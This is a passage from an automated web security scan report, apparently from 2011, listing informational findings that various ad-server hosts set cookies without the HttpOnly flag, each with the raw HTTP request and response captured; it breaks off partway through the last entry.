1x4tO_Sj_92V_c3sy_af5K1wDa53eNzFiV73vp6h1m4YoN9gfv5UHXFQ2EokABglYvcvHxrKLhk0Oa_Km3kT-DB1pnpY41igpyJxMNQF2iyMUjVL7ttzR-BfUlxiurrQNK1NDp-4mMBHEuc5cySrnTOh9dMxUw7WE-jbWH4kVY90906vEqljUXjN51Jt0mGvCxzEQwCiVbU9JMq477_djhhS3SPkBUOiwXvNZ5qXshwvYwx79p4ngj3vtri-pvt5MhqWaQjjpMBxrbO3BokNWkTLwjj2gCtgf5Qhl2YOxdQQWgOxtDIlnQE-ofvOlTreFo8nIhLOXDY0psUlTnGLNnnydFejHnHxno5JcWuh9OwP5WPMPXscRpCIMXQlyEV2-I3IIzy91bwO_d9EJo3mm3QAFgWCzMlsJM2789Ns8YMIodbd9oSQ80dokkKUxJ75kJBDo9prd088xC1yzr7JSNK1C6Wfrc4PoBe7PQexZTwznXHLToARBEFWiadK-MzpgjJo-jTvrGslxQxMOSg_OH8TApjcKQRDrCNo_fKO0O6rQrNBeK1ac1kY-R5cTHDVI8fjybjRvjybj510L1lHuYF9vOfs3PRLc9kbvpzilPLXHi079KP_3ZX9zZRVXQGO8fW7t8V-mYdCaHNEq30AVPVAGoRKur0pKj4xDrZjSDW0d6Ge5h2FkoPIancXXoaEoJE3Hc2DB_YXf8kw1AXaLIxSNUvu23NH4F9S_CGxtVF2UhIqHPNqrCcBYzlzJKudM6H10zFTDtYT6Nv-v4sX3PfZzMJc61lkh2-hBzDtWEUaNjGqsIqgzYdZZrjvv92OGFLdI-QFQ6LBe85R3vMoYhkXhWy5J91UXk-OuL6m-3kyGpZpCOOkwHGtsCD6mq_S30vkfPB6K8A_ZRfdaBCNZWyJXoWnm04UEXix-86VOt4WjyciEs5cNjSmxxPvN6RLPLO1p4lQ5lrgMzFxa6H07A_lY8w9exxGkIgxt0vsiobF6ODkmglJ7mWGMPTKgqOHGcDR_Emj6qnilT1JI7eQCKlb1D2RYtn4wmX8JnT_77eO3YOrJ4Sg6Z4khadK-MzpgjJo-jTvrGslxQ6fi7HczpIMBvCBfMsrwX6pv9BiYngppqZAgOJPk3JR39idVXIu3f3Btwc7IzjVzjy2rMvBfZvNr-p9IKhzMtG_vpzilPLXHi079KP_3ZX9zXb6Tz5WewXZbgAbPJA1Kjx1hJ3Lx2jTH6Z2vbSJvJVgmvJ__nR9G2kz2nFBjBqYhxmY5WhWxlfSu5D7TjXyp5Ew1AXaLIxSNUvu23NH4F9SRsHGj-wraaDOVo-NnY8Z4bGjtD6F1vlAvbNz2LW0-XKY7_lT1bl78jcEnJ5WkDxaCFrKFt2PqJqf5DVukUoXlIHbOBASPSx_aSP-y9lN0xDYq3g0SjnCHIdwFIgaPN2GjM2E94Xjq_zRsOz19_sukeQe8KkXlnoIS6MkKzv5MhJ-zCwLajI_fAi7yzInpUPfqRl9A2iCBQ4QmbLn8QybuN97-yRVKiOkq451CVtrK-L_B9P-PLsJaA2q91YwrJSsVjkSgci3DslhbhLAHtk-5yNmlzVaY-ux4ldMmn95-Mr2ngwrG9CjJIipUiIWpKw0p87U_E8RCtd37Q5K62pPbYE3fjGnapFf2sSY7pRQig4QkcT5omhxvFxaDBZv8HsDc7oWxx3lMWh66OLM4EbN-7gsqGSEylLNa_SWJb-nVLwCV0QM7hreP48O_HKFKVj-fDyYACmr51dWIG_2mo97mPu8Iaf_kTsqgk7ugXpuyF50sVuvaLjQZQB-z3BRWjAOi3ckepqtCIQvo_oG8eMg83LsUjEPrRcsES3aoJiQUJTHUYLYRhoyzRad2pnwkOXjJjGluiggZfpQC0_zBkEv-v_j1kf0lu_F76LshZ13njOq9AcoC0Ui5m2rwOSIdaFvHPrlj9faHB4xTE0H4ycU-Far0EQ9jI2dgmB77e0oaHmNisOYCeGi33B_vta6JSr3j6o1UpD0LBlPnfb4q3Dmtj6bGXbZIhpmPDYJ3mAwabzJVvtmA9XADUGeSzCUmHsqeVvKRG6bTklSz_s9jHGHsU5_u3GxZteiyVHpNKhDzL7vQ0mJRuzfPJxh9dK_7uFehBzO10MqyMuK8xC49hxun-96l9nCAyeIF8XErkhGdpskxfTLV8EIwWVQ2uHZJLUSdGm0TeMLOBK0QhS-o5a2xyahlNh3iZjtdsIooTjsgAVMIgXUnyIDF5CqCarUh49S01Mh8PTu4y-hqompR6VWaJIG7SFeGTv62fgtjg1I8JQTrvXTA5V0FO00TmOhQnOjFd2gRw98MdY27_C75SQT3F4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA7HAeaX_6Zr-t3T_LQ2J_VLuAlmfHhZv8RdvHYfz6uVtWY4Zb1B-5Vx0eIvlVDYxBk; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: fc=FYu9a2gKbdfaoEP6zzAEbTULe5uzocfVf8GeQRlhtGzifjwXXf-M0jf6P6DTaEkggmUcePzA9deCmnu56kGfo3G9nFGYIVw5iLaHzkGYEwm4HlP0fRkaM5HlzXZ0g2VP9BoIXaOAeDVXRsLRbsFkfKtr4MnGGfFMDcCsCfLKkyPojEuHv26X9eomoEX8ElP2; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: pf=_1vlf3coaTRSlfnRn2BWvmKCqkXYWBqc-E6-ZlkCbgGS04H7stKnZdMqlx3yK2bUZZ6eDl_tJYtkuIVW7eskVZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:23:16 GMT
Content-Length: 10877


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

18.176. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1021183&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!!v!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!#<wb#h!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!$<wb#g!!L[f!!!!#<wYl+!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#q),!!!!#<wO:5!#q2T!!!!$<wb#g!#q2U!!!!$<wb#g!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$#WA!!!!$<w[_`!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!w!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!#<wb#h!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!$<wb#g!!L[f!!!!#<wYl+!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!#<wb)?!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#q),!!!!#<wO:5!#q2T!!!!$<wb#g!#q2U!!!!$<wb#g!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$#WA!!!!$<w[_`!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1033198129/?label=ddVgCJ3Y4wEQsbTV7AM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Sun, 24 Apr 2011 03:08:32 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


18.177. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=689448&t=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.yieldmanager.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:35:45 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!#!#-H0!!!!#<wleu"; path=/; expires=Wed, 24-Apr-2013 00:35:45 GMT
Set-Cookie: uid=uid=f524716e-6ed3-11e0-a64c-003048d6d652&_hmacv=1&_salt=4160135711&_keyid=k1&_hmac=62b7ee639f2afeb901b54430eec580d666789759; path=/; expires=Wed, 25-May-2011 00:35:45 GMT
Cache-Control: no-store
Last-Modified: Mon, 25 Apr 2011 00:35:45 GMT
Pragma: no-cache
Content-Length: 0
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close


18.178. http://adfarm1.adition.com/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adfarm1.adition.com
Path:   /track

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track?co=1&rdm=15241710.050031543&sid=1132&tid=328&clickurl= HTTP/1.1
Host: adfarm1.adition.com
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: co=1

Response

HTTP/1.1 200 OK
Server: ADITIONSERVER 1.0
Date: Sun, 24 Apr 2011 20:49:50 +0200
Connection: close
Cache-Control: no-cache
Content-Type: text/plain
Expires: Sa, 01-01-2000 00:00:00 GMT
P3P: policyref="http://imagesrv.adition.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMo OUR NOR COM"
Pragma: no-cache
Set-Cookie: UserID1=15639664155; expires=We, 01-Jan-2025 00:00:00 GMT; path=/; domain=.adfarm1.adition.com
Set-Cookie: co=1; path=/; expires=We, 01-Jan-2025 00:00:00 GMT; domain=.adfarm1.adition.com
Content-Length: 1


18.179. http://ads.asp.net/a.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.asp.net
Path:   /a.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a.aspx?ZoneID=483&Task=Get&PageID=68996&SiteID=4 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://windowsclient.net/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Set-Cookie: ASP.NET_SessionId=t5ppe045r3jddjrhhcugtw45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=t5ppe045r3jddjrhhcugtw45; path=/; HttpOnly
Set-Cookie: %24SPIDER=False; path=/
Set-Cookie: %24CC=US; expires=Mon, 25-Apr-2011 15:57:35 GMT; path=/
Set-Cookie: %24RC=TX; expires=Mon, 25-Apr-2011 15:57:35 GMT; path=/
Set-Cookie: %24MC=0; expires=Mon, 25-Apr-2011 15:57:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:35 GMT
Content-Length: 328

<body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=483&CampaignID=2105&AdvertiserID=76&BannerID=2826&SiteID=4&RandomNumber=2024692060&Keywords=" target="_Blank"><img src="htt
...[SNIP]...

18.180. http://ads.neudesicmediagroup.com/ads/1_300x250_TFS_greyblu_vault_SM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /ads/1_300x250_TFS_greyblu_vault_SM.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/1_300x250_TFS_greyblu_vault_SM.gif HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 57286
Content-Type: image/gif
Last-Modified: Wed, 26 Jan 2011 23:43:38 GMT
Accept-Ranges: bytes
ETag: "7b77d5dab2bdcb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25;Path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:40 GMT

GIF89a,....?.',6........
...FMXgmwf......v.17Bpw.......QXd.........[co......;BN.............#+.Tj...r.........d~.......BT...".................~.....6x....}..fbf...)Yd>..ZUY...zuz...ECG.........<<<=...
...[SNIP]...

18.181. http://ads.neudesicmediagroup.com/ads/2_300x250_TFS_VS2010book_SM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /ads/2_300x250_TFS_VS2010book_SM.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/2_300x250_TFS_VS2010book_SM.gif HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 27056
Content-Type: image/gif
Last-Modified: Wed, 26 Jan 2011 23:40:55 GMT
Accept-Ranges: bytes
ETag: "cb5cfb79b2bdcb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ARRAffinity=30464d8a7656869aade311c4fc10577c494d1f1c5cc6f1a233eed2120b9320cf;Path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:04 GMT

GIF89a,............l..:+c+.Q....A...TJp...jV....E4v.....T..0@0k/00    .-...ttutg...4.    <=,i..C$.HNOOI!q:.Y0#S...:b.............A.k.p.C;....9Y=.i...;.a..81..k~.EC.@+lFo.(.NFR..Mz!.F...2$b........::-y....
...[SNIP]...

18.182. http://ads.neudesicmediagroup.com/ads/728-NMG-Blue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /ads/728-NMG-Blue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/728-NMG-Blue.gif HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 66225
Content-Type: image/gif
Last-Modified: Thu, 24 Feb 2011 00:15:33 GMT
Accept-Ranges: bytes
ETag: "aff4b7f3b7d3cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ARRAffinity=30464d8a7656869aade311c4fc10577c494d1f1c5cc6f1a233eed2120b9320cf;Path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:04 GMT

GIF89a..Z..........fx........i.O......VW..1...1Qh. #.3S.Is..-.0L.Hn.^..>`.T..k..T....x... 5W...p........Q|.-H1GX....My.`..9X.(AGcw.........Thw.."...Ae.Ej...    6T....Jq.%=...@Sa.f..lk.y..$>...    4R...BZl!
...[SNIP]...

18.183. http://ads.neudesicmediagroup.com/ads/DV-300x250.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /ads/DV-300x250.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/DV-300x250.png HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 76938
Content-Type: image/png
Last-Modified: Wed, 27 Oct 2010 21:06:40 GMT
Accept-Ranges: bytes
ETag: "bb677fd91a76cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25;Path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:55:08 GMT

.PNG
.
...IHDR...,.................tEXtSoftware.Adobe ImageReadyq.e<..,,IDATx.....%.Y'......{..=+k/.......6.R...`0../`3..o./c...........f.Y7....K7...HU.*k...../g_bu...w.gd.{oUe....(.(n....w.}....~..
...[SNIP]...

18.184. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:46|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=8%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=8%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=$CTURL$&r=0.41022151810352664 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:46:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2479
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-B4D5-95AF-1209-8C0000530202; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:1|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:1|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQud:1|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiO:1|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQudGKiO:1|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

18.185. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

